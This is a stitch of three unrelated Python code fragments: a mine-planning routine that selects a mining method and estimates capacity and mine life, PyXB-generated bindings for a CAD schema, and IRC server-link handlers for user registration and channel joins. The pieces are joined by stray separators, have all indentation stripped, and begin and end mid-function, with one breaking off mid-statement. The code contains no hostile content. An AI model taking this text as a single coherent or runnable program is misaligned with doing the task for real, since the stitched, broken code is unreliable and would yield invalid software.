# Intermediate 10-30m
# Narrow < 10 m
# Plunge
# Flat < 20 degrees
# Intermediate 20-55 degrees
# Steep > 55 degrees
doUnderground = self.miningMethod == "UG"
print("doUnderground", doUnderground)
print("mineManager.theOreBody.dip", mineManager.theOreBody.dip)
if (doUnderground):
if (mineManager.theOreBody.dip < flatPlunge ): # see selection process for hard rock mining by Carter
self.miningMethod = "UG_RP"
# Room and pilar
# "Typically flat and tabular"
elif (mineManager.theOreBody.width < narrowWidth ):
# Cut and fill
self.miningMethod = "UG_CF"
elif (mineManager.theOreBody.dip > steepPlunge and mineManager.theOreBody.width > thickWidth and mineManager.theOreBody.height > mineManager.theOreBody.width ):
# Block cave
self.miningMethod = "UG_BC"
else:
# Stoping
self.miningMethod = "UG_ST"
self.CalculateMineCapacity(problemManager, mineManager)
self.CalculateMineLife(mineManager)
self.CalculateOreMined(mineManager)
self.CalculateMiningCapex(mineManager)
self.CalculateMiningOpex(mineManager)
return self
def CalculateMineCapacity(self,problemManager, mineManager):
"""
Determine the maximum annual extraction for the mine using Taylor's rule
"""
theUnitManager = UnitManager()
orebodyMass = mineManager.theOreBody.CalculateDepositMass()*theUnitManager.ConvertTo("tonne")
theFunctionManager = FunctionManager()
if(self.miningMethod == "OCUG"):
taylorsRuleFunc = theFunctionManager.GetFunction("TaylorsRule_" + self.miningMethod[:2])
else:
taylorsRuleFunc = theFunctionManager.GetFunction("TaylorsRule_" + self.miningMethod)
daysPerYear = 350
# operating days per year - assuming 350 days
self.mineCapacity = daysPerYear * taylorsRuleFunc.f( [orebodyMass] )* theUnitManager.ConvertToBaseUnits("tonne")
self.mineOreProductionCapacity = self.mineCapacity
print("Mine ore capacity from Taylor's rule in Mt/year", self.mineCapacity* theUnitManager.ConvertTo("1e6 tonne"))
return self.mineCapacity
def CalculateMineLife(self, mineManager):
"""
Determine the life of the mine
"""
self.orebodyMass = mineManager.theOreBody.CalculateDepositMass()
self.mineLife = self.orebodyMass/(self.mineOreProductionCapacity+1e-64) # rampup/rampdown are not accounted for
self.mineLife = int( np.ceil(self.mineLife) ) # round up to years
theUnitManager = UnitManager()
orebodyMass = mineManager.theOreBody.CalculateDepositMass()*theUnitManager.ConvertTo("tonne")
print("orebodyMass in 1e6 tonne", orebodyMass/1e6)
# undergound
rampLength = mineManager.theOreBody.cover *( 1. + 1./self.rampGrade**2)**0.5
rampVolume = 25*theUnitManager.ConvertToBaseUnits("m^2")*rampLength
# opencut
if(self.miningMethod[:2] == "OC"):
w = mineManager.theOreBody.width
l = mineManager.theOreBody.length
d = mineManager.theOreBody.cover
rampVolume = self.OpenPitExcavatedVolume(w,l,0,d,self.alpha)
overburdenDensity = mineManager.theOreBody.specificDensity*1000*theUnitManager.ConvertToBaseUnits("kg/m^3")
self.actualMineStartupTime = (overburdenDensity*rampVolume)/(self.mineCapacity+1e-64)
self.mineStartupTime = np.max([int( np.ceil(self.actualMineStartupTime) ),1]) # round up to years
self.mineLife += self.mineStartupTime
self.miningCapex = np.zeros(self.mineLife)
self.miningOpex = np.zeros(self.mineLife)
self.depths = np.zeros(self.mineLife)
print("mineLife", self.mineLife)
print("mineStartupTime", self.mineStartupTime)
return self.mineLife
def CalculateOreMined(self, mineManager):
self.materialMined = np.zeros(self.mineLife)
self.oreMined = np.zeros(self.mineLife)
self.wasteMined = np.zeros(self.mineLife)
self.depths = np.zeros(self.mineLife)
if(self.actualMineStartupTime > 1):
tt = int( np.floor( self.actualMineStartupTime ) )
self.materialMined[:tt-1] =self.mineCapacity
self.materialMined[tt-1] =self.mineCapacity*(self.actualMineStartupTime-tt)
else:
self.materialMined[0] =self.mineCapacity*self.actualMineStartupTime
self.materialMined[self.mineStartupTime:-1] = self.mineCapacity # constant in all years but last
self.materialMined[-1] = self.orebodyMass - self.mineCapacity*(self.mineLife-self.mineStartupTime-1) # remainder in last year
# assuming all material mined is ore in underground mines
if(self.miningMethod[:2] == "OC" ): # open cut
self.oreMined = np.array(self.materialMined)
self.oreMined[:self.mineStartupTime] = 0.0
#self.wasteMined = (1 - oreFraction)*self.oreMined
#self.oreMined *= oreFraction
theUnitManager = UnitManager()
theFunctionManager = FunctionManager()
ugMiningOpexFunc = theFunctionManager.GetFunction("MiningOpex_UG_ST") # underground stoping assumed as alternative mining method
ugOpexPerTonne = ugMiningOpexFunc.f( [self.mineCapacity *theUnitManager.ConvertTo("1e6 tonne")] )
ugOpexPerTonneMDepth = self.ugHaulCostPerDepth*theUnitManager.ConvertTo("AUD/tonne/m")
ocMiningOpexFunc = theFunctionManager.GetFunction("MiningOpex_OC")
oreProductionRate = self.mineOreProductionCapacity # taylor's rule gives average ore produced not total material
minD = mineManager.theOreBody.cover
maxD = mineManager.theOreBody.cover + mineManager.theOreBody.height
w = mineManager.theOreBody.length
l = mineManager.theOreBody.width
alpha = self.alpha
| |
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute ReferredPoint uses Python identifier ReferredPoint
__ReferredPoint = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'ReferredPoint'), 'ReferredPoint', '__cad_PointReference__ReferredPoint', STD_ANON_)
__ReferredPoint._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 179, 4)
__ReferredPoint._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 179, 4)
ReferredPoint = property(__ReferredPoint.value, __ReferredPoint.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__ReferredPoint.name() : __ReferredPoint
})
Namespace.addCategoryObject('typeBinding', u'PointReference', PointReference_)
# Complex type {cad}PlaneReference with content type EMPTY
class PlaneReference_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {cad}PlaneReference with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'PlaneReference')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 208, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute ReferredPlane uses Python identifier ReferredPlane
__ReferredPlane = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'ReferredPlane'), 'ReferredPlane', '__cad_PlaneReference__ReferredPlane', STD_ANON_2)
__ReferredPlane._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 209, 4)
__ReferredPlane._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 209, 4)
ReferredPlane = property(__ReferredPlane.value, __ReferredPlane.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__ReferredPlane.name() : __ReferredPlane
})
Namespace.addCategoryObject('typeBinding', u'PlaneReference', PlaneReference_)
# Complex type {cad}GuideDatum with content type EMPTY
class GuideDatum_ (_ImportedBinding__avm.ConnectorFeature_):
"""Complex type {cad}GuideDatum with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'GuideDatum')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 215, 2)
_ElementMap = _ImportedBinding__avm.ConnectorFeature_._ElementMap.copy()
_AttributeMap = _ImportedBinding__avm.ConnectorFeature_._AttributeMap.copy()
# Base type is _ImportedBinding__avm.ConnectorFeature_
# Attribute Datum uses Python identifier Datum
__Datum = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'Datum'), 'Datum', '__cad_GuideDatum__Datum', pyxb.binding.datatypes.anyURI, required=True)
__Datum._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 218, 8)
__Datum._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 218, 8)
Datum = property(__Datum.value, __Datum.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__Datum.name() : __Datum
})
Namespace.addCategoryObject('typeBinding', u'GuideDatum', GuideDatum_)
# Complex type {cad}AssemblyRoot with content type EMPTY
class AssemblyRoot_ (_ImportedBinding__avm.DesignDomainFeature_):
"""Complex type {cad}AssemblyRoot with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'AssemblyRoot')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 230, 2)
_ElementMap = _ImportedBinding__avm.DesignDomainFeature_._ElementMap.copy()
_AttributeMap = _ImportedBinding__avm.DesignDomainFeature_._AttributeMap.copy()
# Base type is _ImportedBinding__avm.DesignDomainFeature_
# Attribute AssemblyRootComponentInstance uses Python identifier AssemblyRootComponentInstance
__AssemblyRootComponentInstance = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AssemblyRootComponentInstance'), 'AssemblyRootComponentInstance', '__cad_AssemblyRoot__AssemblyRootComponentInstance', pyxb.binding.datatypes.anyURI, required=True)
__AssemblyRootComponentInstance._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 233, 8)
__AssemblyRootComponentInstance._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 233, 8)
AssemblyRootComponentInstance = property(__AssemblyRootComponentInstance.value, __AssemblyRootComponentInstance.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__AssemblyRootComponentInstance.name() : __AssemblyRootComponentInstance
})
Namespace.addCategoryObject('typeBinding', u'AssemblyRoot', AssemblyRoot_)
# Complex type {cad}KinematicJointSpec with content type EMPTY
class KinematicJointSpec_ (_ImportedBinding__avm.ConnectorFeature_):
"""Complex type {cad}KinematicJointSpec with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'KinematicJointSpec')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 237, 2)
_ElementMap = _ImportedBinding__avm.ConnectorFeature_._ElementMap.copy()
_AttributeMap = _ImportedBinding__avm.ConnectorFeature_._AttributeMap.copy()
# Base type is _ImportedBinding__avm.ConnectorFeature_
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', u'KinematicJointSpec', KinematicJointSpec_)
# Complex type {cad}Geometry2D with content type EMPTY
class Geometry2D_ (Geometry_):
"""Complex type {cad}Geometry2D with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Geometry2D')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 106, 2)
_ElementMap = Geometry_._ElementMap.copy()
_AttributeMap = Geometry_._AttributeMap.copy()
# Base type is Geometry_
# Attribute GeometryQualifier inherited from {cad}Geometry
# Attribute PartIntersectionModifier inherited from {cad}Geometry
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', u'Geometry2D', Geometry2D_)
# Complex type {cad}Geometry3D with content type EMPTY
class Geometry3D_ (Geometry_):
"""Complex type {cad}Geometry3D with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Geometry3D')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 111, 2)
_ElementMap = Geometry_._ElementMap.copy()
_AttributeMap = Geometry_._AttributeMap.copy()
# Base type is Geometry_
# Attribute GeometryQualifier inherited from {cad}Geometry
# Attribute PartIntersectionModifier inherited from {cad}Geometry
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', u'Geometry3D', Geometry3D_)
# Complex type {cad}CustomGeometry with content type ELEMENT_ONLY
class CustomGeometry_ (Geometry_):
"""Complex type {cad}CustomGeometry with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'CustomGeometry')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 156, 2)
_ElementMap = Geometry_._ElementMap.copy()
_AttributeMap = Geometry_._AttributeMap.copy()
# Base type is Geometry_
# Element CustomGeometryInput uses Python identifier CustomGeometryInput
__CustomGeometryInput = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'CustomGeometryInput'), 'CustomGeometryInput', '__cad_CustomGeometry__CustomGeometryInput', True, pyxb.utils.utility.Location(u'avm.cad.xsd', 160, 10), )
CustomGeometryInput = property(__CustomGeometryInput.value, __CustomGeometryInput.set, None, None)
# Attribute GeometryQualifier inherited from {cad}Geometry
# Attribute PartIntersectionModifier inherited from {cad}Geometry
_ElementMap.update({
__CustomGeometryInput.name() : __CustomGeometryInput
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', u'CustomGeometry', CustomGeometry_)
# Complex type {cad}RevoluteJointSpec with content type ELEMENT_ONLY
class RevoluteJointSpec_ (KinematicJointSpec_):
"""Complex type {cad}RevoluteJointSpec with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'RevoluteJointSpec')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 242, 2)
_ElementMap = KinematicJointSpec_._ElementMap.copy()
_AttributeMap = KinematicJointSpec_._AttributeMap.copy()
# Base type is KinematicJointSpec_
# Element MinimumRotation uses Python identifier MinimumRotation
__MinimumRotation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MinimumRotation'), 'MinimumRotation', '__cad_RevoluteJointSpec__MinimumRotation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 246, 10), )
MinimumRotation = property(__MinimumRotation.value, __MinimumRotation.set, None, None)
# Element DefaultRotation uses Python identifier DefaultRotation
__DefaultRotation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'DefaultRotation'), 'DefaultRotation', '__cad_RevoluteJointSpec__DefaultRotation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 247, 10), )
DefaultRotation = property(__DefaultRotation.value, __DefaultRotation.set, None, None)
# Element MaximumRotation uses Python identifier MaximumRotation
__MaximumRotation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MaximumRotation'), 'MaximumRotation', '__cad_RevoluteJointSpec__MaximumRotation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 248, 10), )
MaximumRotation = property(__MaximumRotation.value, __MaximumRotation.set, None, None)
# Attribute AlignmentPlane uses Python identifier AlignmentPlane
__AlignmentPlane = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentPlane'), 'AlignmentPlane', '__cad_RevoluteJointSpec__AlignmentPlane', pyxb.binding.datatypes.anyURI, required=True)
__AlignmentPlane._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 250, 8)
__AlignmentPlane._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 250, 8)
AlignmentPlane = property(__AlignmentPlane.value, __AlignmentPlane.set, None, None)
# Attribute AlignmentAxis uses Python identifier AlignmentAxis
__AlignmentAxis = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentAxis'), 'AlignmentAxis', '__cad_RevoluteJointSpec__AlignmentAxis', pyxb.binding.datatypes.anyURI, required=True)
__AlignmentAxis._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 251, 8)
__AlignmentAxis._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 251, 8)
AlignmentAxis = property(__AlignmentAxis.value, __AlignmentAxis.set, None, None)
# Attribute RotationLimitReference uses Python identifier RotationLimitReference
__RotationLimitReference = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'RotationLimitReference'), 'RotationLimitReference', '__cad_RevoluteJointSpec__RotationLimitReference', pyxb.binding.datatypes.anyURI)
__RotationLimitReference._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 252, 8)
__RotationLimitReference._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 252, 8)
RotationLimitReference = property(__RotationLimitReference.value, __RotationLimitReference.set, None, None)
_ElementMap.update({
__MinimumRotation.name() : __MinimumRotation,
__DefaultRotation.name() : __DefaultRotation,
__MaximumRotation.name() : __MaximumRotation
})
_AttributeMap.update({
__AlignmentPlane.name() : __AlignmentPlane,
__AlignmentAxis.name() : __AlignmentAxis,
__RotationLimitReference.name() : __RotationLimitReference
})
Namespace.addCategoryObject('typeBinding', u'RevoluteJointSpec', RevoluteJointSpec_)
# Complex type {cad}TranslationalJointSpec with content type ELEMENT_ONLY
class TranslationalJointSpec_ (KinematicJointSpec_):
"""Complex type {cad}TranslationalJointSpec with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'TranslationalJointSpec')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 256, 2)
_ElementMap = KinematicJointSpec_._ElementMap.copy()
_AttributeMap = KinematicJointSpec_._AttributeMap.copy()
# Base type is KinematicJointSpec_
# Element MinimumTranslation uses Python identifier MinimumTranslation
__MinimumTranslation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MinimumTranslation'), 'MinimumTranslation', '__cad_TranslationalJointSpec__MinimumTranslation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 260, 10), )
MinimumTranslation = property(__MinimumTranslation.value, __MinimumTranslation.set, None, None)
# Element DefaultTranslation uses Python identifier DefaultTranslation
__DefaultTranslation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'DefaultTranslation'), 'DefaultTranslation', '__cad_TranslationalJointSpec__DefaultTranslation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 261, 10), )
DefaultTranslation = property(__DefaultTranslation.value, __DefaultTranslation.set, None, None)
# Element MaximumTranslation uses Python identifier MaximumTranslation
__MaximumTranslation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MaximumTranslation'), 'MaximumTranslation', '__cad_TranslationalJointSpec__MaximumTranslation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 262, 10), )
MaximumTranslation = property(__MaximumTranslation.value, __MaximumTranslation.set, None, None)
# Attribute AlignmentPlane uses Python identifier AlignmentPlane
__AlignmentPlane = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentPlane'), 'AlignmentPlane', '__cad_TranslationalJointSpec__AlignmentPlane', pyxb.binding.datatypes.anyURI, required=True)
__AlignmentPlane._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 264, 8)
__AlignmentPlane._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 264, 8)
AlignmentPlane = property(__AlignmentPlane.value, __AlignmentPlane.set, None, None)
# Attribute AlignmentAxis uses Python identifier AlignmentAxis
__AlignmentAxis = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentAxis'), 'AlignmentAxis', '__cad_TranslationalJointSpec__AlignmentAxis', pyxb.binding.datatypes.anyURI, required=True)
__AlignmentAxis._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 265, 8)
__AlignmentAxis._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 265, 8)
AlignmentAxis = property(__AlignmentAxis.value, __AlignmentAxis.set, None, None)
# Attribute TranslationLimitReference uses Python identifier TranslationLimitReference
__TranslationLimitReference = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'TranslationLimitReference'), 'TranslationLimitReference', '__cad_TranslationalJointSpec__TranslationLimitReference', pyxb.binding.datatypes.anyURI)
__TranslationLimitReference._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 266, 8)
__TranslationLimitReference._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 266, 8)
TranslationLimitReference = property(__TranslationLimitReference.value, __TranslationLimitReference.set, None, None)
_ElementMap.update({
__MinimumTranslation.name() : __MinimumTranslation,
__DefaultTranslation.name() : __DefaultTranslation,
__MaximumTranslation.name() : __MaximumTranslation
})
_AttributeMap.update({
__AlignmentPlane.name() : __AlignmentPlane,
__AlignmentAxis.name() : __AlignmentAxis,
__TranslationLimitReference.name() : __TranslationLimitReference
})
Namespace.addCategoryObject('typeBinding', u'TranslationalJointSpec', TranslationalJointSpec_)
# Complex type {cad}Circle with content type ELEMENT_ONLY
class Circle_ (Geometry2D_):
"""Complex type {cad}Circle with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Circle')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 116, 2)
_ElementMap = Geometry2D_._ElementMap.copy()
_AttributeMap = Geometry2D_._AttributeMap.copy()
# Base type is Geometry2D_
# Element CircleCenter uses Python identifier CircleCenter
__CircleCenter = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'CircleCenter'), 'CircleCenter', '__cad_Circle__CircleCenter', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 120, 10), )
CircleCenter = property(__CircleCenter.value, __CircleCenter.set, None, None)
# Element CircleEdge uses Python identifier CircleEdge
__CircleEdge = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'CircleEdge'), 'CircleEdge', '__cad_Circle__CircleEdge', True, pyxb.utils.utility.Location(u'avm.cad.xsd', 121, 10), )
CircleEdge = property(__CircleEdge.value, __CircleEdge.set, None, None)
# Attribute GeometryQualifier inherited from {cad}Geometry
# Attribute PartIntersectionModifier inherited from {cad}Geometry
_ElementMap.update({
__CircleCenter.name() : __CircleCenter,
__CircleEdge.name() : __CircleEdge
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', u'Circle', Circle_)
# Complex type {cad}Polygon with content type ELEMENT_ONLY
class Polygon_ (Geometry2D_):
"""Complex type {cad}Polygon with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Polygon')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 126, 2)
_ElementMap = Geometry2D_._ElementMap.copy()
_AttributeMap = Geometry2D_._AttributeMap.copy()
# Base type is Geometry2D_
# Element PolygonPoint uses Python identifier PolygonPoint
__PolygonPoint = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'PolygonPoint'), 'PolygonPoint', '__cad_Polygon__PolygonPoint', True, pyxb.utils.utility.Location(u'avm.cad.xsd', 130, 10), )
PolygonPoint = property(__PolygonPoint.value, | |
1
self.ircd.userid[uuid] = newUser
for remoteserver in self.ircd.servers.itervalues():
if remoteserver.nearHop == self.ircd.name and remoteserver != self:
remoteserver.callRemote(ConnectUser, uuid=uuid, ip=ip, server=server, secure=secure, signon=signon)
return {}
ConnectUser.responder(basicConnectUser)
def addUser(self, uuid, nick, ident, host, realhost, gecos, ip, password, server, secure, signon, nickts):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if server not in self.ircd.servers:
raise NoSuchServer ("The server {} is not connected to the network.".format(server))
self.ignoreUsers.discard(uuid) # very unlikely, but if a user is being introduced reusing a UUID, remove from ignored
oldUser = None
if uuid in self.ircd.userid:
oldUser = self.ircd.userid[uuid]
if oldUser.nickname:
raise UserAlreadyConnected ("The uuid {} already exists on the network.".format(uuid))
signontime = datetime.utcfromtimestamp(signon)
nicktime = datetime.utcfromtimestamp(nickts)
if nick in self.ircd.users:
udata = self.ircd.users[nick]
if nicktime < udata.nicktime:
udata.disconnect("Nickname collision", self.name)
elif nicktime == udata.nicktime:
if signontime < udata.signon:
udata.disconnect("Nickname collision", self.name)
elif signontime == udata.signon:
udata.disconnect("Nickname collision", self.name)
self.ignoreUsers.add(uuid)
if oldUser:
del self.ircd.userid[uuid]
return {}
else:
self.ignoreUsers.add(uuid)
if oldUser:
del self.ircd.userid[uuid]
return {}
else:
self.ignoreUsers.add(uuid)
if oldUser:
del self.ircd.userid[uuid]
return {}
if oldUser:
newUser = oldUser
newUser.nickname = nick
newUser.username = ident
newUser.hostname = host
newUser.realhost = realhost
newUser.realname = gecos
newUser.password = password if password else None
newUser.nicktime = nicktime
newUser.metadata = oldUser.metadata
newUser.cache = oldUser.cache
newUser.registered = 0
else:
newUser = RemoteUser(self.ircd, uuid, nick, ident, host, realhost, gecos, ip, password if password else None, server, secure, signontime, nicktime)
self.ircd.users[nick] = newUser
self.ircd.userid[uuid] = newUser
newUser.callConnectHooks()
for linkedServer in self.ircd.servers.itervalues():
if linkedServer.nearHop == self.ircd.name and linkedServer != self:
linkedServer.callRemote(RegisterUser, uuid=uuid, nick=nick, ident=ident, host=host, realhost=realhost, gecos=gecos, ip=ip, password=password, server=server, secure=secure, signon=signon, nickts=nickts)
return {}
RegisterUser.responder(addUser)
def removeUser(self, user, reason):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The user {} is not on the network.".format(user))
self.ircd.userid[user].disconnect(reason, self.name)
return {}
RemoveUser.responder(removeUser)
def setIdent(self, user, ident):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The user {} is not on the network.".format(user))
self.ircd.userid[user].setUsername(ident, self.name)
return {}
SetIdent.responder(setIdent)
def setHost(self, user, host):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The user {} is not on the network.".format(user))
self.ircd.userid[user].setHostname(host, self.name)
return {}
SetHost.responder(setHost)
def setName(self, user, gecos):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The user {} is not on the network.".format(user))
self.ircd.userid[user].setRealname(gecos, self.name)
return {}
SetName.responder(setName)
def requestJoin(self, channel, user):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The given user is not connected to the network.")
if channel in self.ircd.channels:
cdata = self.ircd.channels[channel]
else:
cdata = IRCChannel(self.ircd, channel)
self.ircd.userid[user].join(cdata)
return {}
RequestJoinChannel.responder(requestJoin)
def joinChannel(self, channel, user, chants):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user in self.ignoreUsers:
return {}
if user not in self.ircd.userid:
raise NoSuchUser ("The user {} is not connected to the network.".format(user))
udata = self.ircd.userid[user]
if channel in self.ircd.channels:
cdata = self.ircd.channels[channel]
for server in self.ircd.servers.itervalues(): # Propagate first so the chancreate hook can't screw things up (if being created)
if server.nearHop == self.ircd.name and server != self:
server.callRemote(JoinChannel, channel=cdata.name, chants=epoch(cdata.created), user=udata.uuid)
chantime = datetime.utcfromtimestamp(chants)
if chantime < cdata.created:
cdata.created = chantime
modes = []
params = []
for mode, param in cdata.mode.iteritems():
modetype = self.ircd.channel_mode_type[mode]
if modetype == 0:
for item in param:
modes.append(mode)
params.append(item)
elif modetype == 3:
modes.append(mode)
else:
modes.append(mode)
params.append(param)
for u, status in cdata.users.iteritems():
for mode in status:
modes.append(mode)
params.append(u.nickname)
cdata.users[u] = ""
cdata.topic = ""
cdata.topicSetter = self.ircd.name
cdata.topicTime = cdata.created
for u in cdata.users.iterkeys():
if u.server == self.ircd.name:
u.sendMessage("MODE", "-{}".format("".join(modes)), " ".join(params), to=cdata.name)
u.sendMessage("TOPIC", ":", to=cdata.name)
else:
cdata = IRCChannel(self.ircd, channel)
cdata.created = datetime.utcfromtimestamp(chants)
cdata.topicTime = cdata.created
for server in self.ircd.servers.itervalues(): # Propagate first so the chancreate hook can't screw things up (if being created)
if server.nearHop == self.ircd.name and server != self:
server.callRemote(JoinChannel, channel=cdata.name, chants=epoch(cdata.created), user=udata.uuid)
self.ircd.channels[channel] = cdata
for action in self.ircd.actions["chancreate"]:
action(cdata)
if udata in cdata.users:
return {}
cdata.users[udata] = ""
joinShowUsers = cdata.users.keys()
tryagain = []
for action in self.ircd.actions["joinmessage"]:
result = action(cdata, udata, joinShowUsers)
if result == "again":
tryagain.append(action)
else:
joinShowUsers = result
for action in tryagain:
joinShowUsers = action(cdata, udata, joinShowUsers)
for u in joinShowUsers:
if u.server == self.ircd.name:
u.sendMessage("JOIN", to=cdata.name, prefix=udata.prefix())
if cdata.topic and udata.server == self.ircd.name:
udata.sendMessage(irc.RPL_TOPIC, cdata.name, ":{}".format(cdata.topic))
udata.sendMessage(irc.RPL_TOPICWHOTIME, cdata.name, cdata.topicSetter, str(epoch(cdata.topicTime)))
elif udata.server == self.ircd.name:
udata.sendMessage(irc.RPL_NOTOPIC, cdata.name, ":No topic is set")
for action in self.ircd.actions["join"]:
action(udata, cdata)
return {}
JoinChannel.responder(joinChannel)
